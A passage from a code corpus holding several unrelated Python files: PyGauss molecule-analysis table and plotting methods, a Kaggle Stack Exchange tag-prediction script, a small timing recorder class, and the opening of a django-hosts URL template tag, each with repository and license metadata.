(used pygauss.utils.df_to_img) na_rep : str how to represent empty (nan) cells (if outputting image) width, height, unconfined : int, int, bool args for IPy Image Returns ------- df : pandas.DataFrame a table of data """ pd.set_option('precision', precision) if mol: df = self._df.copy() else: df = self._df.drop('Molecule', 
axis=1) for key, val in filters.iteritems(): if type(val) is list or type(val) is tuple: df = df[getattr(df, key).isin(val)] else: df = df[getattr(df, key)==val] if type(rows) is not list and type(rows) is not tuple: rows = [rows] if type(columns) is not list and type(columns) is not tuple: columns = [columns] if rows: df = df.loc[rows] if columns: cols = columns[:] if type(row_index) is list: cols += row_index else: cols.append(row_index) if mol: cols.append('Molecule') unique_cols = [] [unique_cols.append(x) for x in cols if x not in unique_cols] df = df.ix[:,unique_cols] if row_index: df = df.set_index(row_index) if column_index: col_index=[] for col in df.columns: col_tuple = (' ', col) for term in column_index: if len(col)>len(term): if col[:len(term)] == term: col_tuple = (term, col[len(term)+1:]) continue col_index.append(col_tuple) df.columns = pd.MultiIndex.from_tuples(col_index) if head: df = df.head(head) if as_image: return df_to_img(df, na_rep=na_rep, font_size=font_size, width=width, height=height, unconfined=unconfined) return df def remove_rows(self, rows): """remove one or more rows of molecules Parameters ---------- rows : int or list of ints: the rows to remove """ self._df.drop(rows, inplace=True) return self.get_table() def remove_columns(self, columns): self._df.drop(columns, axis=1, inplace=True) return self.get_table() _basic_properties={'nbasis':'get_basis_funcs', 'basis':'get_basis_descript', 'optimised':'is_optimised', 'opt_error': 'get_run_error', 'conformer': 'is_conformer'} def get_basic_property(self, prop, *args, **kwargs): """returns a series of a basic run property or nan if it is not available Parameters ---------- prop : str can be 'basis', 'nbasis', 'optimised', 'opt_error' or 'conformer' """ if prop not in self._basic_properties.keys(): raise ValueError('{0} not a molecule property'.format(prop)) def get_prop(m): method = getattr(m, self._basic_properties[prop]) try: out = method(*args, **kwargs) except: out = pd.np.nan return out return self._df.Molecule.map(get_prop) def add_basic_properties(self, props=['basis', 'nbasis', 'optimised', 'conformer']): """adds columns giving info of basic run properties """ for prop in props: try: series = self.get_basic_property(prop) except Exception: print 'error reading {0} \n setting to NaN'.format(prop) series = pd.np.nan self._df[prop.capitalize()] = series return self.get_table() def remove_non_optimised(self): """removes runs that were not optimised """ non_optimised = self._df[self.get_basic_property('optimised')!=True].copy() self._df = self._df[self.get_basic_property('optimised')==True] return non_optimised def remove_non_conformers(self, cutoff=0.): """removes runs with negative frequencies """ non_conformers = self._df[self.get_basic_property('conformer', cutoff=cutoff)!=True].copy() self._df = self._df[self.get_basic_property('conformer', cutoff=cutoff)==True] return non_conformers def add_mol_property(self, name, method, *args, **kwargs): """compute molecule property for all rows and create a data column Parameters ---------- name : str what to name the data column method : str what molecule method to call *args : various arguments to pass to the molecule method **kwargs : various keyword arguments to pass to the molecule method """ if type(name) is tuple or type(name) is list: for idx, n in enumerate(name): func = lambda m: getattr(m, method)(*args, **kwargs)[idx] self._df[n] = self._df.Molecule.map(func) else: func = lambda m: getattr(m, method)(*args, **kwargs) self._df[name] = 
self._df.Molecule.map(func) return self.get_table() def add_mol_property_subset(self, name, method, rows=[], filters={}, args=[], kwargs={}, relative_to_rows=[]): """compute molecule property for a subset of rows and create/add-to data column Parameters ---------- name : str or list of strings name for output column (multiple if method outputs more than one value) method : str what molecule method to call rows : list what molecule rows to calculate the property for filters : dict filter for selecting molecules to calculate the property for args : list the arguments to pass to the molecule method kwargs : dict the keyword arguments to pass to the molecule method relative_to_rows: list of ints compute values relative to the summated value(s) of molecule at the rows listed """ df = self.get_table(rows=rows, filters=filters, mol=True) if relative_to_rows: rel_df = self.get_table(rows=relative_to_rows, mol=True) if type(name) is tuple or type(name) is list: for idx, n in enumerate(name): func = lambda m: getattr(m, method)(*args, **kwargs)[idx] vals = df.Molecule.map(func) if relative_to_rows: rel_val = rel_df.Molecule.map(func).sum() vals = vals - rel_val if n in self._df.columns: self._df[n] = vals.combine_first(self._df[n]) else: self._df[n] = vals else: func = lambda m: getattr(m, method)(*args, **kwargs) vals = df.Molecule.map(func) if relative_to_rows: rel_val = rel_df.Molecule.map(func).sum() vals = vals - rel_val if name in self._df.columns: self._df[name] = vals.combine_first(self._df[name]) else: self._df[name] = vals return self.get_table() def get_ids(self, variable_names, variable_lists): """return ids of a list of unique computations """ df = self.get_table() df['Index'] = df.index df.set_index(variable_names, inplace=True) df.sortlevel(inplace=True) ids = [] for variable_lst in variable_lists: df1 = df.copy() try: for v in variable_lst: df1 = df1.loc[v] except KeyError: raise ValueError( 'could not find variable set; {}'.format(variable_lst)) i = df1.Index if hasattr(i, 'values'): raise ValueError( 'variable set is not unique; {}'.format(variable_lst)) ids.append(int(i)) return ids def get_molecule(self, row): """ get molecule object coresponding to particular row """ return copy.deepcopy(self._df.Molecule.loc[row]) ## TODO will active work? 
def yield_mol_images(self, rows=[], filters={}, mtype='optimised', sort_columns=[], align_to=[], rotations=[[0., 0., 0.]], gbonds=True, represent='ball_stick', zoom=1., width=300, height=300, axis_length=0, background='white', relative=False, minval=-1, maxval=1, highlight=[], active=False, sopt_min_energy=20., sopt_cutoff_energy=0., atom_groups=[], alpha=0.5, transparent=False, hbondwidth=5, eunits='kJmol-1', no_hbonds=False, ipyimg=True): """yields molecules Parameters ---------- mtype : 'initial', 'optimised', 'nbo', 'highlight', 'highlight-initial', 'sopt' or 'hbond' info_columns : list of str columns to use as info in caption max_cols : int maximum columns in plot label_size : int subplot label size (pts) start_letter : str starting (capital) letter for labelling subplots save_fname : str name of file, if you wish to save the plot to file rows : int or list index for the row of each molecule to plot (all plotted if empty) filters : dict {columns:values} to filter by sort_columns : list of str columns to sort by align_to : [int, int, int] align geometries to the plane containing these atoms rotations : list of [float, float, float] for each rotation set [x,y,z] an image will be produced gbonds : bool guess bonds between atoms (via distance) represent : str representation of molecule ('none', 'wire', 'vdw' or 'ball_stick') zoom : float zoom level of images width : int width of original images height : int height of original images (although width takes precedent) axis_length : float length of x,y,z axes in negative and positive directions background : matplotlib.colors background color relative : bool coloring of nbo atoms scaled to min/max values in atom set (for nbo mtype) minval : float coloring of nbo atoms scaled to absolute min (for nbo mtype) maxval : float coloring of nbo atoms scaled to absolute max (for nbo mtype) highlight : list of lists atom indxes to highlight (for highlight mtype) eunits : str the units of energy to return (for sopt/hbond mtype) sopt_min_energy : float minimum energy to show (for sopt/hbond mtype) sopt_cutoff_energy : float energy below which bonds will be dashed (for sopt mtype) alpha : float alpha color value of geometry (for highlight/sopt/hbond mtypes) transparent : bool whether atoms should be transparent (for highlight/sopt/hbond mtypes) hbondwidth : float width of lines depicting interaction (for hbond mtypes) atom_groups : [list or str, list or str] restrict interactions to between two lists (or identifiers) of atom indexes (for sopt/hbond mtypes) no_hbonds : bool whether to ignore H-Bonds in the calculation ipyimg : bool whether to return an IPython image, PIL image otherwise Yields ------- indx : int the row index of the molecule mol : IPython.display.Image or PIL.Image an image of the molecule in the format specified by ipyimg """ df = self.get_table(columns=['Molecule']+sort_columns, rows=rows, filters=filters, mol=True) if sort_columns: df.sort(sort_columns, inplace=True) show_kwargs = {'gbonds':gbonds, 'represent':represent, 'rotations':rotations, 'zoom':zoom, 'width':width, 'height':height, 'background':background, 'axis_length':axis_length, 'ipyimg':ipyimg} for indx, mol in zip(df.index, df.Molecule): if align_to: align_atoms = mol.get_atom_group(align_to) mol.set_alignment_atoms(*align_atoms) if mtype == 'initial': yield indx, mol.show_initial(**show_kwargs) elif mtype == 'optimised': yield indx, mol.show_optimisation(**show_kwargs) elif mtype == 'nbo': yield indx, mol.show_nbo_charges(relative=relative, minval=minval, maxval=maxval, 
**show_kwargs) elif mtype == 'highlight': yield indx, mol.show_highlight_atoms(highlight, alpha=alpha, optimised=True, transparent=transparent, **show_kwargs) elif mtype == 'highlight-initial': yield indx, mol.show_highlight_atoms(highlight, alpha=alpha, optimised=False, transparent=transparent, **show_kwargs) elif mtype == 'sopt': yield indx, mol.show_sopt_bonds(min_energy=sopt_min_energy, cutoff_energy=sopt_cutoff_energy, no_hbonds=no_hbonds, eunits=eunits, atom_groups=atom_groups, alpha=alpha, transparent=transparent, relative=relative, minval=minval, maxval=maxval, **show_kwargs) elif mtype == 'hbond': yield indx, mol.show_hbond_analysis(min_energy=sopt_min_energy, cutoff_energy=sopt_cutoff_energy, eunits=eunits, atom_groups=atom_groups, bondwidth=hbondwidth, alpha=alpha, transparent=transparent, relative=relative, minval=minval, maxval=maxval, **show_kwargs) else: raise ValueError( 'mtype must be initial, optimised, nbo, highlight, highligh-initial, sopt or hbond') def _get_letter(self, number): """get an uppercase letter according to a number""" if number < 26: return string.ascii_uppercase[number] else: first_letter = string.ascii_uppercase[int(number/26)-1] second_letter = string.ascii_uppercase[number % 26] return first_letter + second_letter def plot_mol_images(self, mtype='optimised', max_cols=1, padding=(1, 1), sort_columns=[], info_columns=[], info_incl_id=False, label_size=20, letter_prefix='', start_letter='A', rows=[], filters={}, align_to=[], rotations=[[0., 0., 0.]], gbonds=True, represent='ball_stick', zoom=1., width=500, height=500, axis_length=0, background='white', relative=False, minval=-1, maxval=1, highlight=[], frame_on=False, eunits='kJmol-1', sopt_min_energy=20., sopt_cutoff_energy=0., atom_groups=[], alpha=0.5, transparent=False, hbondwidth=5, no_hbonds=False): """show molecules in matplotlib table of axes Parameters ---------- mtype : 'initial', 'optimised', 'nbo', 'highlight', 'highlight-initial', 'sopt' or 'hbond' max_cols : int maximum columns in plot padding: tuple padding between images (horizontally, vertically) sort_columns : list of str columns to sort by info_columns : list of str columns to use as info in caption info_incl_id : bool include molecule id number in caption label_size : int subplot label size (pts) letter_prefix : str prefix for labelling subplots start_letter : str starting (capital) letter for labelling subplots rows : int or list index for the row of each molecule to plot (all plotted if empty) filters : dict {columns:values} to filter by align_to : [int, int, int] align geometries to the plane containing these atoms rotations : list of [float, float, float] for each rotation set [x,y,z] an image will be produced gbonds : bool guess bonds between atoms (via distance) represent : str representation of molecule ('none', 'wire', 'vdw' or 'ball_stick') zoom : float zoom level of images width : int width of original images height : int height of original images (although width takes precedent) axis_length : float length of x,y,z axes in negative and positive directions background : matplotlib.colors background color relative : bool coloring of nbo atoms scaled to min/max values in atom set (for nbo mtype) minval : float coloring of nbo atoms scaled to absolute min (for nbo mtype) maxval : float coloring of nbo atoms scaled to absolute max (for nbo mtype) highlight : list of lists atom indxes to highlight (for highlight mtype) eunits : str the units of energy to return (for sopt/hbond mtype) sopt_min_energy : float minimum energy to show 
(for sopt/hbond mtype) sopt_cutoff_energy : float energy below which bonds will be dashed (for sopt mtype) alpha : float alpha color value of geometry (for sopt/hbond mtypes) transparent : bool whether atoms should be transparent (for sopt/hbond mtypes) hbondwidth : float width of lines depicting interaction (for hbond mtypes) atom_groups : [list or str, list or str] restrict interactions to between two lists (or identifiers) of atom indexes (for sopt/hbond mtypes) no_hbonds : bool whether to ignore H-Bonds in the calculation (for sopt only) frame_on : bool whether to show frame around each image Returns ------- fig : matplotlib.figure.Figure A figure containing subplots for each molecule image caption : str A caption describing each subplot, given info_columns """ letter_offset = string.ascii_uppercase.find(start_letter) if letter_offset == -1: raise ValueError('start_letter must be an uppercase single letter') df = self.get_table(rows=rows, columns=info_columns, filters=filters) num_mols = len(df) imgs = self.yield_mol_images(rows=rows, filters=filters, mtype=mtype, align_to=align_to, gbonds=gbonds, represent=represent, sort_columns=sort_columns, rotations=rotations, zoom=zoom, width=width, height=height, axis_length=axis_length, relative=relative, minval=minval, maxval=maxval, highlight=highlight, active=False, ipyimg=False, eunits=eunits, sopt_min_energy=sopt_min_energy, sopt_cutoff_energy=sopt_cutoff_energy, atom_groups=atom_groups, alpha=alpha, transparent=transparent, background=background, hbondwidth=hbondwidth, no_hbonds=no_hbonds) #num_rows = int(math.ceil(num_mols/float(max_cols))) #num_cols = min([max_cols, num_mols]) num_cols=int(max_cols) num_rows=int(math.ceil(num_mols/float(num_cols))) fig, axes = plt.subplots(num_rows, num_cols, squeeze=False, gridspec_kw={'width_ratios':[1]*num_cols}) fig.set_facecolor(background) r,g,b = ColorConverter().to_rgb(background) if ( .241*(255*r)**2 + .691*(255*g)**2 + .068*(255*b)**2 )**0.5 < 130.: label_color = 'white' else: label_color = 'black' for ax in fig.get_axes(): ax.axes.get_xaxis().set_visible(False) ax.axes.get_yaxis().set_visible(False) ax.set_anchor('NW') ax.set_frame_on(False) mol_num = 0 caption = [] for indx, img in imgs: ax = axes[int(math.ceil((mol_num+1)/float(max_cols)))-1, mol_num % max_cols] ax.imshow(img)#, aspect='equal') ax.set_frame_on(frame_on) if label_size: ax.text(0,0.8,letter_prefix+self._get_letter(mol_num+letter_offset), size=label_size, weight="bold", color=label_color) info = ', '.join(df[info_columns].loc[indx].fillna('-').astype(str)) if info_incl_id: info = str(indx) + ', ' + info caption.append( '(' + letter_prefix+self._get_letter(mol_num+letter_offset) + ') ' + info) mol_num += 1 #resize extra axes to be same as last img while mol_num < num_rows*num_cols: ax = axes[int(math.ceil((mol_num+1)/float(max_cols)))-1, mol_num % max_cols] ax.imshow(img) ax.clear() mol_num += 1 fig.tight_layout(w_pad=padding[0], h_pad=padding[1]) caption = ', '.join(caption) #insert newline character every 80 charaters #caption = re.sub("(.{80})", "\\1\n", caption, 0, re.DOTALL) return fig, caption def plot_mol_graphs(self, gtype='energy', share_plot=False, max_cols=1, padding=(1,1), tick_rotation=0, rows=[], filters={}, sort_columns=[], info_columns=[], info_incl_id=False, letter_prefix='', start_letter='A', grid=True, sharex=True, sharey=True, legend_size=10, color_scheme='jet', eunits='eV', per_energy=1., lbound=None, ubound=None, color_homo='g', color_lumo='r', 
homo_lumo_lines=True,homo_lumo_values=True,band_gap_value=True): """get a set of data plots for each molecule Parameters ---------- gtype : str the type of plot, energy = optimisation energies, freq = frequency analsis, dos = Densty of States, share_plot : bool whether to plot all data on the same or separate axes max_cols : int maximum columns on plots (share_plot=False only) padding: tuple padding between images (horizontally, vertically) tick_rotation : int rotation of x-axis labels rows : int or list index for the row of each molecule to plot (all plotted if empty) filters : dict {columns:values} to filter by sort_columns : list of str columns to sort by info_columns : list of str columns to use as info in caption info_incl_id : bool include molecule id number in labels letter_prefix : str prefix for labelling subplots (share_plot=False only) start_letter : str starting (capital) letter for labelling subplots (share_plot=False only) grid : bool whether to include a grid in the axes sharex : bool whether to align x-axes (share_plot=False only) sharey : bool whether to align y-axes (share_plot=False only) legend_size : int the font size (in pts) for the legend color_scheme : str the scheme to use for each molecule (share_plot=True only) according to http://matplotlib.org/examples/color/colormaps_reference.html eunits : str the units of energy to use per_energy : float energy interval to group states by (DoS only) lbound : float lower bound energy (DoS only) ubound: float upper bound energy (DoS only) color_homo : matplotlib.colors color of homo in matplotlib format color_lumo : matplotlib.colors color of lumo in matplotlib.colors homo_lumo_lines : bool draw lines at HOMO and LUMO energies homo_lumo_values : bool annotate HOMO and LUMO lines with exact energy values band_gap_value : bool annotate inbetween HOMO and LUMO lines with band gap value Returns ------- data : matplotlib.figure.Figure plotted frequency data caption : str A caption describing each subplot, given info_columns """ df = self.get_table(columns=list(set(info_columns+sort_columns)), rows=rows, filters=filters, mol=True) num_plots = df.index.shape[0] if sort_columns: df.sort(sort_columns, inplace=True) if gtype == 'energy': mol_func = 'plot_opt_energy' x_label = 'Optimisation Step' y_label = 'Energy ({0})'.format(eunits) all_plot_kwargs = {'units':eunits} per_plot_kwargs = {'linecolor':getattr(cm,color_scheme)( np.linspace(0.1, 0.9, num_plots))} elif gtype == 'freq': mol_func = 'plot_freq_analysis' x_label = 'Frequency ($cm^{-1}$)' y_label = 'IR Intensity ($km/mol$)' all_plot_kwargs = {} per_plot_kwargs = {'color':getattr(cm,color_scheme)( np.linspace(0, 1, num_plots)), 'alpha':np.linspace(1, 0.5, num_plots), 'marker_size':np.linspace(25, 15, num_plots)} elif gtype == 'dos': if share_plot: raise ValueError('share_plots not available for Density of States') mol_func = 'plot_dos' x_label = 'Density of States (per {0} {1})'.format(per_energy, eunits) y_label = 'Energy ({})'.format(eunits) all_plot_kwargs = {'eunits':eunits, 'per_energy':per_energy, 'lbound':lbound, 'ubound':ubound, 'color_homo':color_homo, 'color_lumo':color_lumo, 'homo_lumo_lines':homo_lumo_lines, 'homo_lumo_values':homo_lumo_values, 'band_gap_value':band_gap_value, 'legend_size':legend_size} else: raise ValueError('gtype; {0}, not available'.format(gtype)) ax_num = 0 caption = [] if share_plot: fig, ax = plt.subplots() legend = [] for indx, row in df.iterrows(): plot_kwargs = all_plot_kwargs.copy() for k, v in per_plot_kwargs.iteritems(): plot_kwargs[k] = 
v[ax_num] getattr(row.Molecule, mol_func)(ax=ax, **plot_kwargs) label = ', '.join(row[info_columns].fillna('-').astype(str)) if info_incl_id: label = str(indx) + ', ' + label legend.append(label) ax_num += 1 ax.grid(grid) for tick in ax.get_xticklabels(): tick.set_rotation(tick_rotation) ax.legend(legend, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., prop={'size':legend_size}) else: num_rows = int(math.ceil(num_plots/float(max_cols))) num_cols = min([max_cols, num_plots]) fig, axes = plt.subplots(nrows=num_rows, ncols=num_cols, squeeze=False, sharex=sharex, sharey=sharey) letter_offset = string.ascii_uppercase.find(start_letter) if letter_offset == -1: raise ValueError('start_letter must be an uppercase single letter') for indx, row in df.iterrows(): i = int(math.ceil((ax_num+1)/float(max_cols)))-1 j = ax_num % max_cols getattr(row.Molecule, mol_func)(ax=axes[i,j], **all_plot_kwargs) axes[i,j].grid(grid) for tick in axes[i,j].get_xticklabels(): tick.set_rotation(tick_rotation) info = ', '.join(row[info_columns].fillna('-').astype(str)) if info_incl_id: info = str(indx) + ', ' + info letter = self._get_letter(ax_num+letter_offset) axes[i,j].set_title(letter_prefix+letter, fontweight="bold") caption.append('(' + letter_prefix+letter + ') ' + info) ax_num += 1 #hide extraneous axes for extra_ax in range(ax_num, num_rows*num_cols): i = int(math.ceil((extra_ax+1)/float(max_cols)))-1 j = extra_ax % max_cols axes[i,j].axis('off') ax = fig.add_subplot(111) # The big subplot ax.tick_params(top='off', bottom='off', left='off', right='off', labelbottom='on', labelleft='on', pad=25) ax.set_xticklabels([]) ax.set_yticklabels([]) ax.set_frame_on(False) ax.set_xlabel(x_label) ax.set_ylabel(y_label) fig.tight_layout(w_pad=padding[0], h_pad=padding[1]) caption = ', '.join(caption) return fig, caption def plot_radviz_comparison(self, category_column, columns=[], rows=[], filters={}, point_size=30, **kwargs): """return plot axis of radviz graph RadViz is a way of visualizing multi-variate data. It is based on a simple spring tension minimization algorithm. Basically you set up a bunch of points in a plane. In our case they are equally spaced on a unit circle. Each point represents a single attribute. You then pretend that each sample in the data set is attached to each of these points by a spring, the stiffness of which is proportional to the numerical value of that attribute (they are normalized to unit interval). The point in the plane, where our sample settles to (where the forces acting on our sample are at an equilibrium) is where a dot representing our sample will be drawn. Depending on which class that sample belongs it will be colored differently. """ col_names = self._df.drop('Molecule', axis=1).columns.tolist() if category_column not in col_names: raise ValueError('{0} not in columns'.format(category_column)) columns = columns[:] if columns and category_column not in columns: if all(isinstance(item, int) for item in columns): columns.append(col_names.index(category_column)) else: columns.append(category_column) df = self.get_table(rows, columns, filters) df = df.sort(category_column) f, ax = plt.subplots() ax = radviz(df, category_column, ax=ax, s=point_size, **kwargs) ax.axes.get_xaxis().set_visible(False) ax.axes.get_yaxis().set_visible(False) ax.set_frame_on(False) ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) 
return ax def calc_kmean_groups(self, category_column, category_name, groups, columns=[], rows=[], filters={}): """calculate the kmeans grouping of rows The KMeans algorithm clusters data by trying to separate samples in n groups of equal variance, minimizing a criterion known as the inertia or within-cluster sum-of-squares. This algorithm requires the number of clusters to be specified. It scales well to large number of samples and has been used across a large range of application areas in many different fields. """ col_names = self._df.drop('Molecule', axis=1).columns.tolist() if category_column not in col_names: raise ValueError('{0} not in columns'.format(category_column)) filters[category_column] = category_name df = self.get_table(rows, columns, filters) k_means = KMeans(n_clusters=groups) k_means.fit(df) cats = k_means.predict(df) return pd.DataFrame({'Name':category_name, 'Category':cats}, index=df.index) if __name__ == '__main__': pass
chrisjsewell/PyGauss
pygauss/analysis.py
Python
gpl-3.0
44,913
0.00993
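# A hypothetical usage sketch for the Analysis class defined in
# pygauss/analysis.py above, assuming the pygauss package is importable and
# that Gaussian files matching the made-up naming patterns below exist in the
# given folder; the headers and values are illustrative only.
from pygauss.analysis import Analysis

analysis = Analysis(folderpath='path/to/gaussian/runs',
                    headers=['Anion', 'Initial'])
errors = analysis.add_runs(headers=['Anion', 'Initial'],
                           values=[['cl', 'br'], [1, 2]],
                           init_pattern='mol_{0}_{1}_init.com',   # hypothetical pattern
                           opt_pattern='mol_{0}_{1}_opt.log',     # hypothetical pattern
                           ipython_print=True)
analysis.add_basic_properties()
print(analysis.get_table(precision=2))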
# -*- coding: utf-8 -*- """ Created on Tue Dec 13 23:10:40 2016 @author: zhouyu """ #%% import pandas as pd import numpy as np import os import re import nltk from nltk.corpus import stopwords from bs4 import BeautifulSoup os.chdir('/Users/zhouyu/Documents/Zhou_Yu/DS/kaggle_challenge/text processing') #%% step1: import data import glob alltrainfiles = glob.glob("*.csv") raw_text =pd.concat((pd.read_csv(f,index_col = None, header =0) for f in alltrainfiles),ignore_index = True) #raw_text = pd.read_csv("crypto.csv",index_col = None) #%% step2: clean data, remove HTML, symbols and stopwords def text_to_words(rawtext): #split into individual words, remove HTML, only keep letters and number # convert letters to lower case reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]') words = [word for word in reg_c.split(rawtext.lower()) if word!=''] stops = set(stopwords.words("english")) #take out stop words meaningful_words = [w for w in words if not w in stops] return(" ".join(meaningful_words)) def target_to_words(rawtext): #only return the first target word reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]') words = [word for word in reg_c.split(rawtext.lower()) if word!=''] stops = set(stopwords.words("english")) #take out stop words meaningful_words = [w for w in words if not w in stops] return(meaningful_words[0]) #%% cleaned_post = [] cleaned_target = [] sz = raw_text.shape[0] for i in range(0,sz): raw_post = raw_text['title'][i]+' '+raw_text['content'][i] raw_post = BeautifulSoup(raw_post).get_text() cleaned_post.append(text_to_words(raw_post)) cleaned_target.append(target_to_words(raw_text['tags'][i])) if((i+1)%1000==0): print "Cleanning %d of %d\n" % (i+1,sz) #print cleaned_post[1] #%% step3: creating features from a bag of words from sklearn.feature_extraction.text import CountVectorizer count_vect = CountVectorizer(analyzer = "word", \ tokenizer = None, \ preprocessor = None, \ stop_words = None, \ max_features = 5000) X_train_counts = count_vect.fit_transform(cleaned_post) #X_target_counts = count_vect.fit_transform(cleaned_target) from sklearn.feature_extraction.text import TfidfTransformer tf_transformer = TfidfTransformer(use_idf = False).fit(X_train_counts) X_train_tf = tf_transformer.transform(X_train_counts) #%% training a linear model # METHOD 1: BUILD randomforestclassifier... from sklearn.ensemble import RandomForestClassifier rf = RandomForestClassifier(n_estimators = 10) forest = rf.fit(X_train_tf, cleaned_target) #%% examine the result produced by METHOD 1: pred = rf.predict(X_train_tf) from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report from collections import OrderedDict import matplotlib.pyplot as plt import itertools def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) thresh = cm.max() / 2. 
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, cm[i, j], horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') cnf_matrix = confusion_matrix(cleaned_target,pred) #target_names = set(cleaned_target) #np.set_printoptions(precision = 2) #plt.figure() #plot_confusion_matrix(cnf_matrix,classes = target_names,normalize = True,title='Normalized confusion matrix') #plt.show() target_names = list(OrderedDict.fromkeys(cleaned_target)) print(classification_report(cleaned_target,pred,target_names = target_names)) ####### #%% Method 2: directly predicted as the highest frequency element # find the highest tf-idf #step1: select a random sample from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report from collections import OrderedDict sample = np.random.choice(87000,1000,replace = False) tf_pred = [] tf_target = [] for i in range(0,1000): r = sample[i]; tf_target.append(cleaned_target[r]) tf_post = X_train_tf.getrow(r).toarray() tf_post_max = tf_post.argmax() tf_pred.append(count_vect.get_feature_names()[tf_post_max]) tf_cnf_matrix = confusion_matrix(tf_target,tf_pred) target_names = list(OrderedDict.fromkeys(tf_pred+tf_target)) print(classification_report(tf_target, tf_pred,target_names =target_names)) #%% evaluate test set test = pd.read_csv('test/test.csv') cleaned_test = [] test_sz = test.shape[0] for i in range(0,test_sz): test_post = test['title'][i]+' '+test['content'][i] test_post = BeautifulSoup(test_post).get_text() cleaned_test.append(text_to_words(test_post)) if((i+1)%1000==0): print "Cleanning %d of %d\n" % (i+1,test_sz) #%% use random forest X_test_counts = count_vect.fit_transform(cleaned_test) X_test_tf = tf_transformer.transform(X_test_counts) result = forest.predict(X_test_counts) # use max tf-idf #%% test_pred = [] for i in range(0,test_sz): tf_test = X_test_tf.getrow(i).toarray() # just return one tag #tf_test_max = tf_test.argmax() #test_pred.append(count_vect.get_feature_names()[tf_test_max]) ind = np.argpartition(tf_test,-4)[:,-4:] pred_tags = [count_vect.get_feature_names()[j] for j in ind[0,:].tolist()] test_pred.append( " ".join(pred_tags)) if((i+1)%1000==0): print "Predicting %d of %d\n" % (i+1,test_sz) result = test_pred #%% prepare submission submission = pd.read_csv('test/sample_submission.csv') submission.iloc[:,1] = result submission.to_csv('test/submission.csv',index = None) #%% try to use NMF model can not be mapped to specific question... n_features = 5000 n_topics = 10 n_samples = test_sz n_top_words = 4 def get_top_words(model, feature_names, n_top_words): res = [] for topic_idx, topic in enumerate(model.components_): tags = " ".join([feature_names[i] for i in topic.argsort()[:-n_top_words - 1:-1]]) res.append(tags) return res from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer from sklearn.decomposition import NMF from time import time tfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, max_features=n_features, stop_words='english') tfidf = tfidf_vectorizer.fit_transform(cleaned_test) # Fit the NMF model print("Fitting the NMF model (Frobenius norm) with tf-idf features, " "n_samples=%d and n_features=%d..." % (n_samples, n_features)) t0 = time() nmf = NMF(n_components=n_topics, random_state=1, alpha=.1, l1_ratio=.5).fit(tfidf) print("done in %0.3fs." 
% (time() - t0)) print("\nTopics in NMF model (Frobenius norm):") tfidf_feature_names = tfidf_vectorizer.get_feature_names() #print_top_words(nmf, tfidf_feature_names, n_top_words) result = get_top_words(nmf,tfidf_feature_names,n_top_words)
sadahanu/DataScience_SideProject
Stack_Exchange/py2_text.py
Python
mit
7,689
0.017167
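# A hypothetical sanity check for the text_to_words cleaner defined in the
# script above. It assumes the NLTK English stopword list is available locally
# (nltk.download('stopwords')) and that the function is in scope; the sample
# post text is made up.
from bs4 import BeautifulSoup

raw_post = "<p>How do I store Bitcoin keys safely?</p>"
cleaned = text_to_words(BeautifulSoup(raw_post).get_text())
print(cleaned)  # expected along the lines of: "store bitcoin keys safely"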
#!/usr/bin/python
import time


class Recorder(object):
    debug = 0

    def __init__(self):
        self.recordings = []
        self.lastRecord = 0
        if Recorder.debug:
            print("init Recorder")

    def record(self):
        # Store the interval since the previous record() call
        now = time.time()
        if self.lastRecord != 0:
            self.recordings.append(now - self.lastRecord)
            if Recorder.debug:
                print(len(self.recordings), " ", self.recordings[-1])
        self.lastRecord = now

    def empty(self):
        # True while no interval has been recorded yet
        return len(self.recordings) == 0

    def minInterval(self):
        # Shortest recorded interval, or 0 if nothing has been recorded
        return 0 if len(self.recordings) == 0 else min(self.recordings)
detman/stomplooper
recorder.py
Python
gpl-3.0
646
0.010836
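# A small, hypothetical driver for the Recorder class above: record() stores
# the gap since the previous call, empty() reports whether any gap has been
# stored yet, and minInterval() returns the shortest stored gap.
import time

r = Recorder()
for _ in range(3):
    r.record()
    time.sleep(0.01)        # arbitrary spacing between "taps"
print(r.empty())            # False, two intervals have been stored
print(r.minInterval())      # roughly 0.01 seconds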
import re

from django import template
from django.conf import settings
from django.template import TemplateSyntaxError
from django.template.base import FilterExpression
from django.template.defaulttags import URLNode
from django.utils.encoding import iri_to_uri, smart_str
from django.urls import set_urlconf, get_urlconf

from ..resolvers import reverse_host, get_host
from ..utils import normalize_scheme, normalize_port

register = template.Library()

kwarg_re = re.compile(r"(?:(\w+)=)?(.+)")


class HostURLNode(URLNode):

    def __init__(self, *args, **kwargs):
        self.host = kwargs.pop('host')
        self.host_args = kwargs.pop('host_args')
        self.host_kwargs = kwargs.pop('host_kwargs')
        self.scheme = kwargs.pop('scheme')
        self.port = kwargs.pop('port')
        super(HostURLNode, self).__init__(*args, **kwargs)

    def maybe_resolve(self, var, context):
        """
        Variable may have already been resolved in e.g. a LoopNode,
        so we only resolve() if needed.
        """
        if isinstance(var, FilterExpression):
            return var.resolve(context)
        return var

    def render(self, context):
        host = get_host(self.maybe_resolve(self.host, context))
        current_urlconf = get_urlconf()
        try:
            set_urlconf(host.urlconf)
            path = super(HostURLNode, self).render(context)
            if self.asvar:
                path = context[self.asvar]
        finally:
            set_urlconf(current_urlconf)
        host_args = [self.maybe_resolve(x, context) for x in self.host_args]
        host_kwargs = dict((smart_str(k, 'ascii'), self.maybe_resolve(v, context))
                           for k, v in self.host_kwargs.items())
        if self.scheme:
            scheme = normalize_scheme(self.maybe_resolve(self.scheme, context))
        else:
            scheme = host.scheme
